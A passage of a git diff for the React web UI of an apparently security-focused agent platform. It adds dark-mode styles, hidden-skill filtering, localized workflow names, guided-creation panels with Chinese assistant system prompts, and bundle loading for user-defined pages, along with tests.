+          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-slate-400 hover:bg-slate-50 transition-all duration-200 shadow-sm hover:shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:hover:border-slate-500/70 dark:hover:bg-zinc-800 dark:hover:shadow-none"
         >
           <Shield className="w-5 h-5 text-slate-600" />
-          <span className="font-medium text-gray-700">{t('welcome.alertTriage')}</span>
+          <span className="font-medium text-gray-700 dark:text-zinc-200">{t('welcome.alertTriage')}</span>
         </button>
         <button
           onClick={() => onSuggestion(t('welcome.threatHuntingSuggestion'))}
-          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-orange-400 hover:bg-orange-50 transition-all duration-200 shadow-sm hover:shadow-md"
+          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-orange-400 hover:bg-orange-50 transition-all duration-200 shadow-sm hover:shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:hover:border-orange-500/70 dark:hover:bg-orange-950/30 dark:hover:shadow-none"
         >
           <Search className="w-5 h-5 text-orange-600" />
-          <span className="font-medium text-gray-700">{t('welcome.threatHunting')}</span>
+          <span className="font-medium text-gray-700 dark:text-zinc-200">{t('welcome.threatHunting')}</span>
         </button>
         <button
           onClick={() => onSuggestion(t('welcome.incidentResponseSuggestion'))}
-          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-amber-400 hover:bg-amber-50 transition-all duration-200 shadow-sm hover:shadow-md"
+          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-amber-400 hover:bg-amber-50 transition-all duration-200 shadow-sm hover:shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:hover:border-amber-500/70 dark:hover:bg-amber-950/30 dark:hover:shadow-none"
         >
           <AlertTriangle className="w-5 h-5 text-amber-600" />
-          <span className="font-medium text-gray-700">{t('welcome.incidentResponse')}</span>
+          <span className="font-medium text-gray-700 dark:text-zinc-200">{t('welcome.incidentResponse')}</span>
         </button>
       </div>
     </div>
diff --git a/webui/src/pages/Skill/SkillSheet.test.tsx b/webui/src/pages/Skill/SkillSheet.test.tsx
index 556837967..505a9f5be 100644
--- a/webui/src/pages/Skill/SkillSheet.test.tsx
+++ b/webui/src/pages/Skill/SkillSheet.test.tsx
@@ -53,7 +53,7 @@ const entityTranslations: Record<string, string> = {
   'entity.defaultCreate': '创建',
   'entity.defaultSave': '保存',
   'entity.tabDetails': '详情',
-  'entity.tabAIEdit': 'AI 编辑',
+  'entity.tabAIEdit': '工作台',
   'entity.tabTest': '测试',
   'entity.cancelButton': '取消',
   'entity.testButton': '测试',
@@ -115,7 +115,7 @@ describe('SkillSheet', () => {
 
     it('should default to Rex tab in create mode', () => {
       render(<SkillSheet {...defaultProps} />);
-      expect(screen.getByText('AI 编辑')).toBeInTheDocument();
+      expect(screen.getByText('工作台')).toBeInTheDocument();
     });
   });
 
diff --git a/webui/src/pages/Skill/SkillSheet.tsx b/webui/src/pages/Skill/SkillSheet.tsx
index a96d79510..b11665c36 100644
--- a/webui/src/pages/Skill/SkillSheet.tsx
+++ b/webui/src/pages/Skill/SkillSheet.tsx
@@ -7,13 +7,15 @@
  * - Rex chat mode (natural language → extract config into form)
  */
 
-import { useState } from 'react';
+import { useMemo, useState } from 'react';
 import { useTranslation } from 'react-i18next';
 import { BookOpen, Lock, Pencil, Eye, Save, Loader2, Trash2 } from 'lucide-react';
 import ReactMarkdown from 'react-markdown';
 import { skillAPI, Skill } from '@/api/skill';
 import { useToast } from '@/components/common/Toast';
 import EntitySheet from '@/components/common/EntitySheet';
+import { buildGuidedCreateGroups } from '@/components/common/GuidedCreatePanel';
+import { useRexComposerControls } from '@/components/common/useRexComposerControls';
 
 interface SkillFormData {
   name: string;
@@ -25,7 +27,7 @@ function buildRexContext(isEdit: boolean, formData: SkillFormData): string {
   if (!isEdit) {
     return `你是 Skill 创建助手。用户希望通过对话来创建一个新的 Skill。
 
-请使用 skill-builder skill 根据用户需求完成创建，产物写入 ~/.flocks/plugins/skills/<skill-name>/ 目录。
+请先加载并遵守项目内 .flocks/plugins/skills/skill-builder（skill-builder skill），再根据用户需求完成创建，产物写入 ~/.flocks/plugins/skills/<skill-name>/ 目录。
 
 **创建流程：**
 1. 先确认用户需求：Skill 名称（kebab-case）、描述、主要功能、作用域（用户/global 或项目）
@@ -33,8 +35,9 @@ function buildRexContext(isEdit: boolean, formData: SkillFormData): string {
 3. 执行 skill 要求的验证，确保 skill 可被系统发现
 
 **重要约束：**
-- 必须先加载 skill-builder skill，再动手写文件
+- 必须先加载 .flocks/plugins/skills/skill-builder，再动手写文件
 - 禁止写到 .flocks/skills/ 等内置 skill 目录
+- 默认写入 ~/.flocks/plugins/skills/<skill-name>/，除非用户明确要求项目级路径
 
 请先引导用户描述需求，信息不足时可追问，然后按 skill 一次性完成创建。`;
   }
@@ -100,6 +103,11 @@ export default function SkillSheet({ skill, onClose, onSaved, onDeleted }: Skill
   const [deleting, setDeleting] = useState(false);
   // Toggle between edit (textarea) and preview (Markdown render) for the content area
   const [contentEditing, setContentEditing] = useState(false);
+  const createGuideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.guideSectionTitle'), actions: t('create.guideActions', { returnObjects: true }) },
+    { title: t('create.caseSectionTitle'), actions: t('create.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const rexComposerControls = useRexComposerControls();
 
   const canSubmit = !isReadonly && (formData.name && formData.description && formData.content);
 
@@ -174,12 +182,16 @@ export default function SkillSheet({ skill, onClose, onSaved, onDeleted }: Skill
       icon={<BookOpen className="w-5 h-5" />}
       rexSystemContext={buildRexContext(isEdit, formData)}
       rexWelcomeMessage={buildRexWelcome(isEdit, skill?.name)}
+      rexGuideGroups={!isEdit ? createGuideGroups : undefined}
+      rexGuidePanelTitle={!isEdit ? t('create.guidePanelTitle') : undefined}
+      rexGuidePanelDesc={!isEdit ? t('create.guidePanelDesc') : undefined}
+      rexGuideEmptyTitle={!isEdit ? t('create.emptyStateTitle') : undefined}
+      rexGuideIcon={!isEdit ? <BookOpen className="h-5 w-5" /> : undefined}
+      {...(!isEdit ? rexComposerControls : {})}
       submitDisabled={!canSubmit}
       submitLoading={loading}
       submitLabel={isReadonly ? t('sheet.submitClose') : undefined}
       hideForm={!isEdit}
-      width={700}
-      maxWidth={900}
       onClose={onClose}
       onSubmit={handleSubmit}
       footerLeft={isEdit ? (
@@ -340,4 +352,4 @@ export default function SkillSheet({ skill, onClose, onSaved, onDeleted }: Skill
       </div>
     </EntitySheet>
   );
-}
\ No newline at end of file
+}
diff --git a/webui/src/pages/Skill/index.test.tsx b/webui/src/pages/Skill/index.test.tsx
index 5bea08b7f..32bfeabd2 100644
--- a/webui/src/pages/Skill/index.test.tsx
+++ b/webui/src/pages/Skill/index.test.tsx
@@ -75,6 +75,13 @@ function makeSkill(name: string) {
   };
 }
 
+function makeUiHiddenSkill(name: string) {
+  return {
+    ...makeSkill(name),
+    ui_hidden: true,
+  };
+}
+
 describe('SkillPage', () => {
   beforeEach(() => {
     vi.clearAllMocks();
@@ -105,4 +112,18 @@ describe('SkillPage', () => {
     expect(refreshMock).toHaveBeenCalledTimes(1);
     expect(toastErrorMock).not.toHaveBeenCalled();
   });
+
+  it('does not render UI-hidden internal skills', async () => {
+    statusMock.mockResolvedValue({
+      data: [makeSkill('visible-skill'), makeUiHiddenSkill('workflow-config-guide')],
+    });
+
+    render(<SkillPage />);
+
+    await waitFor(() => {
+      expect(screen.getByText('visible-skill')).toBeInTheDocument();
+    });
+
+    expect(screen.queryByText('workflow-config-guide')).not.toBeInTheDocument();
+  });
 });
diff --git a/webui/src/pages/Skill/index.tsx b/webui/src/pages/Skill/index.tsx
index df174be4b..f90f38c48 100644
--- a/webui/src/pages/Skill/index.tsx
+++ b/webui/src/pages/Skill/index.tsx
@@ -20,6 +20,7 @@ import LoadingSpinner from '@/components/common/LoadingSpinner';
 import EmptyState from '@/components/common/EmptyState';
 import { useToast } from '@/components/common/Toast';
 import { skillAPI, Skill } from '@/api/skill';
+import { EnabledBadge } from '@/pages/Tool/components/badges';
 import SkillSheet from './SkillSheet';
 import SkillInstallDialog from './SkillInstallDialog';
 
@@ -93,12 +94,12 @@ export default function SkillPage() {
     void fetchSkills();
   }, [fetchSkills]);
 
-  // Skills visible to this page: everything except the internal "system"
-  // category.  Counter chips operate on this set so the totals reflect
-  // what the user can actually see — search and statusFilter both narrow
-  // it further into ``filteredSkills``.
+  // Skills visible to this page: hide skills explicitly marked UI-hidden and
+  // the legacy "system" category. Counter chips operate on this set so the
+  // totals reflect what the user can actually see — search and statusFilter
+  // both narrow it further into ``filteredSkills``.
   const visibleSkills = useMemo(
-    () => skills.filter(s => s.category !== 'system'),
+    () => skills.filter(s => !s.ui_hidden && s.category !== 'system'),
     [skills],
   );
 
@@ -605,8 +606,8 @@ function SkillRow({ skill, isSelected, installingDeps, toggling, onSelect, onIns
   return (
     <tr
       className={`transition-colors ${
-        skill.disabled ? 'opacity-50' : 'hover:bg-gray-50'
-      } ${isSelected ? 'bg-slate-50' : ''}`}
+        skill.disabled ? 'bg-gray-50/40 dark:bg-zinc-900/30' : 'hover:bg-gray-50 dark:hover:bg-zinc-900/60'
+      } ${isSelected ? 'bg-slate-50 dark:bg-zinc-900/80' : ''}`}
     >
       {/* 类型列 */}
       <td className="px-4 py-3">
@@ -664,7 +665,7 @@ function SkillRow({ skill, isSelected, installingDeps, toggling, onSelect, onIns
 
       {/* 启用开关列：控制 skill 是否注入 Agent System Prompt */}
       <td className="px-4 py-3">
-        <ToggleSwitch
+        <SkillEnabledControl
           enabled={enabled}
           loading={toggling}
           title={enabled ? t('toggle.enabledTip') : t('toggle.disabledTip')}
@@ -709,7 +710,7 @@ function SkillRow({ skill, isSelected, installingDeps, toggling, onSelect, onIns
 
 // ─── Sub-components ───────────────────────────────────────────────────────────
 
-function ToggleSwitch({ enabled, loading, title, onChange }: {
+function SkillEnabledControl({ enabled, loading, title, onChange }: {
   enabled: boolean;
   loading: boolean;
   title?: string;
@@ -720,22 +721,18 @@ function ToggleSwitch({ enabled, loading, title, onChange }: {
       type="button"
       role="switch"
       aria-checked={enabled}
+      aria-label={title}
       onClick={onChange}
       disabled={loading}
       title={title}
-      className={`relative inline-flex h-5 w-9 shrink-0 items-center rounded-full border-2 border-transparent
-        transition-colors duration-150 focus:outline-none disabled:cursor-wait
-        ${enabled ? 'bg-slate-700' : 'bg-gray-200'}`}
+      className="relative inline-flex rounded-full transition-opacity focus:outline-none focus-visible:ring-2 focus-visible:ring-gray-300 focus-visible:ring-offset-2 disabled:cursor-wait disabled:opacity-75"
     >
-      {loading
-        ? <Loader2 className="absolute inset-0 m-auto w-3 h-3 text-white animate-spin" />
-        : (
-          <span className={`pointer-events-none inline-block h-4 w-4 rounded-full bg-white shadow
-            transform transition-transform duration-150
-            ${enabled ? 'translate-x-4' : 'translate-x-0'}`}
-          />
-        )
-      }
+      <EnabledBadge enabled={enabled} />
+      {loading && (
+        <span className="absolute inset-0 inline-flex items-center justify-center rounded-full bg-white/70 dark:bg-zinc-900/70">
+          <Loader2 className="w-3 h-3 animate-spin text-gray-500 dark:text-zinc-300" />
+        </span>
+      )}
     </button>
   );
 }
diff --git a/webui/src/pages/Task/TaskSheet.tsx b/webui/src/pages/Task/TaskSheet.tsx
index 780bbf52c..75d0792b7 100644
--- a/webui/src/pages/Task/TaskSheet.tsx
+++ b/webui/src/pages/Task/TaskSheet.tsx
@@ -21,6 +21,7 @@ import { describeCron, CRON_PRESETS, formatDuration, formatTime } from './helper
 import { agentAPI, Agent } from '@/api/agent';
 import { workflowAPI, Workflow } from '@/api/workflow';
 import { getAgentDisplayDescription } from '@/utils/agentDisplay';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 import { StatusBadge } from './components';
 
 // ─── Types ────────────────────────────────────────────────────────────────────
@@ -558,7 +559,7 @@ function TaskFormContent({
                 )}
                 {workflows.map((wf) => (
                   <option key={wf.id} value={wf.id}>
-                    {wf.name}{wf.description ? ` — ${wf.description.slice(0, 30)}${wf.description.length > 30 ? '…' : ''}` : ''}
+                    {getWorkflowDisplayName(wf, i18n.language)}{wf.description ? ` — ${wf.description.slice(0, 30)}${wf.description.length > 30 ? '…' : ''}` : ''}
                   </option>
                 ))}
               </select>
diff --git a/webui/src/pages/Tool/ToolSheets.tsx b/webui/src/pages/Tool/ToolSheets.tsx
index 5d7360cf2..5ba1bfff0 100644
--- a/webui/src/pages/Tool/ToolSheets.tsx
+++ b/webui/src/pages/Tool/ToolSheets.tsx
@@ -6,10 +6,12 @@
  * - GenerateToolSheet: AI 生成自定义工具
  */
 
-import { useState } from 'react';
+import { useMemo, useState } from 'react';
 import { useTranslation } from 'react-i18next';
 import { Database, Cloud, Code, Info, CheckCircle, XCircle, Activity, Wifi, WifiOff, Loader2 } from 'lucide-react';
 import EntitySheet from '@/components/common/EntitySheet';
+import { buildGuidedCreateGroups } from '@/components/common/GuidedCreatePanel';
+import { useRexComposerControls } from '@/components/common/useRexComposerControls';
 import client from '@/api/client';
 import { mcpAPI } from '@/api/mcp';
 
@@ -538,6 +540,11 @@ export function MCPFormFields({
 
 export function MCPSheet({ onClose, onSaved, onRefresh }: MCPSheetProps) {
   const { t } = useTranslation('tool');
+  const guideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.mcp.guideSectionTitle'), actions: t('create.mcp.guideActions', { returnObjects: true }) },
+    { title: t('create.mcp.caseSectionTitle'), actions: t('create.mcp.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const rexComposerControls = useRexComposerControls();
   const [formData, setFormData] = useState<MCPFormData>({
     name: '',
     connType: 'sse',
@@ -627,12 +634,18 @@ export function MCPSheet({ onClose, onSaved, onRefresh }: MCPSheetProps) {
       icon={<Database className="w-5 h-5" />}
       rexSystemContext={MCP_REX_CONTEXT}
       rexWelcomeMessage={MCP_REX_WELCOME}
+      rexGuideGroups={guideGroups}
+      rexGuidePanelTitle={t('create.mcp.guidePanelTitle')}
+      rexGuidePanelDesc={t('create.mcp.guidePanelDesc')}
+      rexGuideEmptyTitle={t('create.mcp.emptyStateTitle')}
+      rexGuideIcon={<Database className="h-5 w-5" />}
+      {...rexComposerControls}
       submitDisabled={!canSubmit}
       submitLoading={submitting}
       submitLabel={t('button.addService')}
       onClose={onClose}
       onSubmit={handleSubmit}
-      initialTab="form"
+      initialTab="rex"
     >
       <MCPFormFields
         formData={formData}
@@ -663,7 +676,7 @@ export function MCPSheet({ onClose, onSaved, onRefresh }: MCPSheetProps) {
 
 const API_REX_CONTEXT = `你是 API 工具接入助手。用户希望通过对话将外部 API 接入为 Flocks API工具。
 
-请使用 tool-builder skill 完成接入，所有产物写入 ~/.flocks/plugins/tools/api/ 目录。
+请先加载并遵守项目内 .flocks/plugins/skills/tool-builder（tool-builder skill）完成接入，所有产物写入 ~/.flocks/plugins/tools/api/ 目录。
 
 **接入流程：**
 1. 先确认 API 功能、Base URL、认证方式（API Key / Bearer 等）
@@ -672,7 +685,7 @@ const API_REX_CONTEXT = `你是 API 工具接入助手。用户希望通过对
 4. 创建后立即启用（enabled: true），确保工具在 Web UI 的 API 服务中可见
 
 **重要约束：**
-- 必须先加载 tool-builder skill，再动手写文件
+- 必须先加载 .flocks/plugins/skills/tool-builder，再动手写文件
 - 禁止写入 flocks/tool/、flocks/tool/generated/ 等项目源码路径
 - 复杂预处理/后处理使用 YAML-Script handler，仍放在 api/ 目录下
 
@@ -695,6 +708,11 @@ interface APISheetProps {
 
 export function APISheet({ onClose }: APISheetProps) {
   const { t } = useTranslation('tool');
+  const guideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.api.guideSectionTitle'), actions: t('create.api.guideActions', { returnObjects: true }) },
+    { title: t('create.api.caseSectionTitle'), actions: t('create.api.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const rexComposerControls = useRexComposerControls();
   const handleSubmit = () => {};
 
   return (
@@ -705,6 +723,12 @@ export function APISheet({ onClose }: APISheetProps) {
       icon={<Cloud className="w-5 h-5" />}
       rexSystemContext={API_REX_CONTEXT}
       rexWelcomeMessage={API_REX_WELCOME}
+      rexGuideGroups={guideGroups}
+      rexGuidePanelTitle={t('create.api.guidePanelTitle')}
+      rexGuidePanelDesc={t('create.api.guidePanelDesc')}
+      rexGuideEmptyTitle={t('create.api.emptyStateTitle')}
+      rexGuideIcon={<Cloud className="h-5 w-5" />}
+      {...rexComposerControls}
       submitDisabled
       submitLabel={t('button.submitToRex')}
       onClose={onClose}
@@ -721,7 +745,7 @@ export function APISheet({ onClose }: APISheetProps) {
 
 const GENERATE_REX_CONTEXT = `你是工具创建助手。用户希望通过对话创建一个新的 Flocks python工具。
 
-请使用 tool-builder skill 根据用户需求完成工具创建，所有产物写入 ~/.flocks/plugins/tools/python 目录。
+请先加载并遵守项目内 .flocks/plugins/skills/tool-builder（tool-builder skill），再根据用户需求完成工具创建，所有产物写入 ~/.flocks/plugins/tools/python 目录。
 
 **创建流程：**
 1. 先确认用户需求：工具名称、功能、输入输出、是否为外部 API 集成
@@ -730,7 +754,7 @@ const GENERATE_REX_CONTEXT = `你是工具创建助手。用户希望通过对
 4. 创建后立即启用，确保工具可用
 
 **重要约束：**
-- 必须先加载 tool-builder skill，再动手写文件
+- 必须先加载 .flocks/plugins/skills/tool-builder，再动手写文件
 - 禁止写入 flocks/tool/、flocks/tool/generated/ 等项目源码路径
 - 外部 API 集成必须提醒用户使用“添加 API”，创建工具默认指 python 工具
 
@@ -751,6 +775,11 @@ interface GenerateToolSheetProps {
 
 export function GenerateToolSheet({ onClose }: GenerateToolSheetProps) {
   const { t } = useTranslation('tool');
+  const guideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.local.guideSectionTitle'), actions: t('create.local.guideActions', { returnObjects: true }) },
+    { title: t('create.local.caseSectionTitle'), actions: t('create.local.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const rexComposerControls = useRexComposerControls();
   const handleSubmit = () => {
     onClose();
   };
@@ -763,9 +792,16 @@ export function GenerateToolSheet({ onClose }: GenerateToolSheetProps) {
       icon={<Code className="w-5 h-5" />}
       rexSystemContext={GENERATE_REX_CONTEXT}
       rexWelcomeMessage={GENERATE_REX_WELCOME}
+      rexGuideGroups={guideGroups}
+      rexGuidePanelTitle={t('create.local.guidePanelTitle')}
+      rexGuidePanelDesc={t('create.local.guidePanelDesc')}
+      rexGuideEmptyTitle={t('create.local.emptyStateTitle')}
+      rexGuideIcon={<Code className="h-5 w-5" />}
+      {...rexComposerControls}
       submitLabel={t('sheet.doneLabel')}
       onClose={onClose}
       onSubmit={handleSubmit}
+      hideForm
     >
       <div className="flex flex-col items-center justify-center py-12 gap-4 text-center">
         <div className="w-16 h-16 rounded-2xl bg-red-50 flex items-center justify-center">
diff --git a/webui/src/pages/UserDefinedPageHost/index.test.tsx b/webui/src/pages/UserDefinedPageHost/index.test.tsx
index 6bf88c148..3f95164ce 100644
--- a/webui/src/pages/UserDefinedPageHost/index.test.tsx
+++ b/webui/src/pages/UserDefinedPageHost/index.test.tsx
@@ -16,6 +16,10 @@ vi.mock('@/api/userDefinedPages', () => ({
   },
 }));
 
+vi.mock('@/api/client', () => ({
+  getApiBase: () => 'https://api.example.test',
+}));
+
 vi.mock('./runtime', () => ({
   installUserDefinedPageRuntime: installMock,
   loadUserDefinedPageBundle: loadBundleMock,
@@ -83,6 +87,10 @@ describe('UserDefinedPageHost', () => {
       expect(screen.getByText('自定义页面内容')).toBeInTheDocument();
     });
     expect(installMock).toHaveBeenCalledWith('dash-1');
+    expect(loadBundleMock).toHaveBeenCalledWith(
+      'https://api.example.test/api/user-defined-pages/dash-1/bundle.js?v=abc123',
+      'host.bundleMissingExport',
+    );
   });
 
   it('shows build error when bundle is not ready', async () => {
diff --git a/webui/src/pages/UserDefinedPageHost/index.tsx b/webui/src/pages/UserDefinedPageHost/index.tsx
index c6e532543..a30cfce6f 100644
--- a/webui/src/pages/UserDefinedPageHost/index.tsx
+++ b/webui/src/pages/UserDefinedPageHost/index.tsx
@@ -76,7 +76,7 @@ export default function UserDefinedPageHost() {
     if (!pageId || !hash) return;
     installUserDefinedPageRuntime(pageId);
     const base = getApiBase();
-    const url = `${base}/api/user-defined-pages/${pageId}/bundle.js?v=${encodeURIComponent(hash)}`;
+    const url = `${base}/api/user-defined-pages/${encodeURIComponent(pageId)}/bundle.js?v=${encodeURIComponent(hash)}`;
     const component = await loadUserDefinedPageBundle(url, tr('host.bundleMissingExport'));
     setPageComponent(() => component);
     setError(null);
diff --git a/webui/src/pages/UserDefinedPageHost/runtime.test.tsx b/webui/src/pages/UserDefinedPageHost/runtime.test.tsx
index 0439ba26b..cce4b5c57 100644
--- a/webui/src/pages/UserDefinedPageHost/runtime.test.tsx
+++ b/webui/src/pages/UserDefinedPageHost/runtime.test.tsx
@@ -1,6 +1,6 @@
 import { describe, expect, it, vi } from 'vitest';
 import apiClient from '@/api/client';
-import { installUserDefinedPageRuntime } from './runtime';
+import { installUserDefinedPageRuntime, loadUserDefinedPageBundle } from './runtime';
 
 describe('UserDefinedPage runtime', () => {
   it('exposes page-scoped api helper', async () => {
@@ -12,4 +12,30 @@ describe('UserDefinedPage runtime', () => {
     expect(getSpy).toHaveBeenCalledWith('/api/user-defined-pages/dash-1/api/stats', undefined);
     getSpy.mockRestore();
   });
+
+  it('loads page bundles through the credentialed api client', async () => {
+    const source = 'export default function Page(){return null;}';
+    const getSpy = vi.spyOn(apiClient, 'get').mockResolvedValue({ data: source } as never);
+    const createObjectURLSpy = vi
+      .spyOn(URL, 'createObjectURL')
+      .mockReturnValue(`data:text/javascript,${encodeURIComponent(source)}`);
+    const revokeObjectURLSpy = vi.spyOn(URL, 'revokeObjectURL').mockImplementation(() => {});
+
+    const component = await loadUserDefinedPageBundle(
+      'https://api.example.test/api/user-defined-pages/dash-1/bundle.js?v=abc123',
+      'missing default',
+    );
+
+    expect(component).toEqual(expect.any(Function));
+    expect(getSpy).toHaveBeenCalledWith(
+      'https://api.example.test/api/user-defined-pages/dash-1/bundle.js?v=abc123',
+      { responseType: 'text' },
+    );
+    expect(createObjectURLSpy).toHaveBeenCalledWith(expect.any(Blob));
+    expect(revokeObjectURLSpy).toHaveBeenCalledWith(expect.stringContaining('data:text/javascript'));
+
+    getSpy.mockRestore();
+    createObjectURLSpy.mockRestore();
+    revokeObjectURLSpy.mockRestore();
+  });
 });
diff --git a/webui/src/pages/UserDefinedPageHost/runtime.tsx b/webui/src/pages/UserDefinedPageHost/runtime.tsx
index 1e1aebbc9..6a0610f78 100644
--- a/webui/src/pages/UserDefinedPageHost/runtime.tsx
+++ b/webui/src/pages/UserDefinedPageHost/runtime.tsx
@@ -89,10 +89,18 @@ export async function loadUserDefinedPageBundle(
   url: string,
   missingExportMessage = 'Page bundle does not export a default component',
 ): Promise<ComponentType> {
-  const mod = await import(/* @vite-ignore */ url);
-  const component = mod.default as ComponentType | undefined;
-  if (!component) {
-    throw new Error(missingExportMessage);
+  const response = await apiClient.get<string>(url, { responseType: 'text' });
+  const source = typeof response.data === 'string' ? response.data : String(response.data ?? '');
+  const moduleUrl = URL.createObjectURL(new Blob([source], { type: 'application/javascript' }));
+
+  try {
+    const mod = await import(/* @vite-ignore */ moduleUrl);
+    const component = mod.default as ComponentType | undefined;
+    if (!component) {
+      throw new Error(missingExportMessage);
+    }
+    return component;
+  } finally {
+    URL.revokeObjectURL(moduleUrl);
   }
-  return component;
 }
diff --git a/webui/src/pages/Workflow/index.test.tsx b/webui/src/pages/Workflow/index.test.tsx
index 72303f7c1..9b0c06551 100644
--- a/webui/src/pages/Workflow/index.test.tsx
+++ b/webui/src/pages/Workflow/index.test.tsx
@@ -1,11 +1,13 @@
 import type { ReactNode } from 'react';
 import { describe, it, expect, vi, beforeEach } from 'vitest';
 import { render, screen, within } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
 import WorkflowPage from './index';
 
-const { mockNavigate, mockUseWorkflows } = vi.hoisted(() => ({
+const { mockNavigate, mockUseWorkflows, mockLanguage } = vi.hoisted(() => ({
   mockNavigate: vi.fn(),
   mockUseWorkflows: vi.fn(),
+  mockLanguage: { current: 'zh-CN' },
 }));
 
 vi.mock('react-router-dom', () => ({
@@ -27,6 +29,7 @@ vi.mock('react-i18next', () => ({
       };
       return translations[key] ?? key;
     },
+    i18n: { language: mockLanguage.current },
   }),
 }));
 
@@ -84,6 +87,7 @@ function makeWorkflow(overrides: Partial<any> = {}) {
 describe('WorkflowPage', () => {
   beforeEach(() => {
     vi.clearAllMocks();
+    mockLanguage.current = 'zh-CN';
     mockUseWorkflows.mockReturnValue({
       workflows: [],
       loading: false,
@@ -114,6 +118,68 @@ describe('WorkflowPage', () => {
     expect(within(builtinRegion).queryByText('Global Workflow')).not.toBeInTheDocument();
   });
 
+  it('按当前语言展示本地化工作流名称', () => {
+    mockUseWorkflows.mockReturnValue({
+      workflows: [
+        makeWorkflow({
+          id: 'wf-localized',
+          name: 'localized_workflow',
+          source: 'global',
+          nameI18n: {
+            'zh-CN': '中文工作流',
+            'en-US': 'English Workflow',
+          },
+        }),
+      ],
+      loading: false,
+      error: null,
+      refetch: vi.fn(),
+    });
+
+    render(<WorkflowPage />);
+
+    expect(screen.getByText('中文工作流')).toBeInTheDocument();
+    expect(screen.queryByText('localized_workflow')).not.toBeInTheDocument();
+  });
+
+  it('从创建入口进入时显式开启新建草稿', async () => {
+    const user = userEvent.setup();
+    mockUseWorkflows.mockReturnValue({
+      workflows: [],
+      loading: false,
+      error: null,
+      refetch: vi.fn(),
+    });
+
+    render(<WorkflowPage />);
+
+    const createButtons = screen.getAllByRole('button', { name: /创建工作流/ });
+    await user.click(createButtons[0]);
+    await user.click(createButtons[1]);
+
+    expect(mockNavigate).toHaveBeenCalledTimes(2);
+    expect(mockNavigate).toHaveBeenNthCalledWith(
+      1,
+      '/workflows/new',
+      expect.objectContaining({
+        state: expect.objectContaining({
+          freshCreate: true,
+          ts: expect.any(Number),
+        }),
+      }),
+    );
+    expect(mockNavigate).toHaveBeenNthCalledWith(
+      2,
+      '/workflows/new',
+      expect.objectContaining({
+        state: expect.objectContaining({
+          freshCreate: true,
+          ts: expect.any(Number),
+        }),
+      }),
+    );
+  });
+
   it('没有自定义工作流时不渲染空分组', () => {
     mockUseWorkflows.mockReturnValue({
       workflows: [makeWorkflow({ id: 'wf-project-only', name: 'Project Only', source: 'project' })],
diff --git a/webui/src/pages/Workflow/index.tsx b/webui/src/pages/Workflow/index.tsx
index 1de6c412b..330c183a1 100644
--- a/webui/src/pages/Workflow/index.tsx
+++ b/webui/src/pages/Workflow/index.tsx
@@ -15,6 +15,7 @@ import LoadingSpinner from '@/components/common/LoadingSpinner';
 import EmptyState from '@/components/common/EmptyState';
 import { useWorkflows } from '@/hooks/useWorkflow';
 import { Workflow } from '@/api/workflow';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 // ---------------------------------------------------------------------------
 // Color helpers (mirrors Agent page)
@@ -72,6 +73,15 @@ export default function WorkflowPage() {
   const [refreshDone, setRefreshDone] = useState(false);
   const [sourceFilter, setSourceFilter] = useState<SourceFilter>('all');
 
+  const openFreshCreate = () => {
+    navigate('/workflows/new', {
+      state: {
+        freshCreate: true,
+        ts: Date.now(),
+      },
+    });
+  };
+
   const builtinWorkflows = useMemo(() => workflows.filter(isBuiltin), [workflows]);
   const customWorkflows  = useMemo(() => workflows.filter(w => !isBuiltin(w)), [workflows]);
 
@@ -183,7 +193,7 @@ export default function WorkflowPage() {
             <RefreshCw className={`w-3.5 h-3.5 ${refreshing ? 'animate-spin' : ''}`} />
           </button>
           <button
-            onClick={() => navigate('/workflows/new')}
+            onClick={openFreshCreate}
             className="inline-flex items-center gap-1.5 px-3 py-1.5 bg-red-600 text-white rounded-lg hover:bg-red-700 transition-colors text-sm"
           >
             <Plus className="w-4 h-4" />
@@ -204,7 +214,7 @@ export default function WorkflowPage() {
             description={t('emptyState.description')}
             action={
               <button
-                onClick={() => navigate('/workflows/new')}
+                onClick={openFreshCreate}
                 className="inline-flex items-center gap-2 px-4 py-2 bg-red-600 text-white rounded-lg hover:bg-red-700"
               >
                 <Plus className="w-5 h-5" />
@@ -324,10 +334,11 @@ function WorkflowSection({
 // ---------------------------------------------------------------------------
 
 function WorkflowCard({ workflow }: { workflow: Workflow }) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const navigate = useNavigate();
   const color = resolveWorkflowColor(workflow);
   const builtin = isBuiltin(workflow);
+  const displayName = getWorkflowDisplayName(workflow, i18n?.language);
 
   const successRate =
     workflow.stats.callCount > 0
@@ -357,7 +368,7 @@ function WorkflowCard({ workflow }: { workflow: Workflow }) {
 
           <div className="min-w-0 flex-1">
             <span className="block text-sm font-semibold text-gray-900 truncate leading-snug">
-              {workflow.name}
+              {displayName}
             </span>
             <div className="flex items-center gap-1 mt-0.5 flex-wrap">
               {/* Source badge */}
diff --git a/webui/src/pages/WorkflowCreate/CreateChatTab.test.tsx b/webui/src/pages/WorkflowCreate/CreateChatTab.test.tsx
new file mode 100644
index 000000000..4e087639b
--- /dev/null
+++ b/webui/src/pages/WorkflowCreate/CreateChatTab.test.tsx
@@ -0,0 +1,421 @@
+import { act, render, screen, waitFor, within } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { MemoryRouter } from 'react-router-dom';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+import type { ComponentProps } from 'react';
+
+import CreateChatTab from './CreateChatTab';
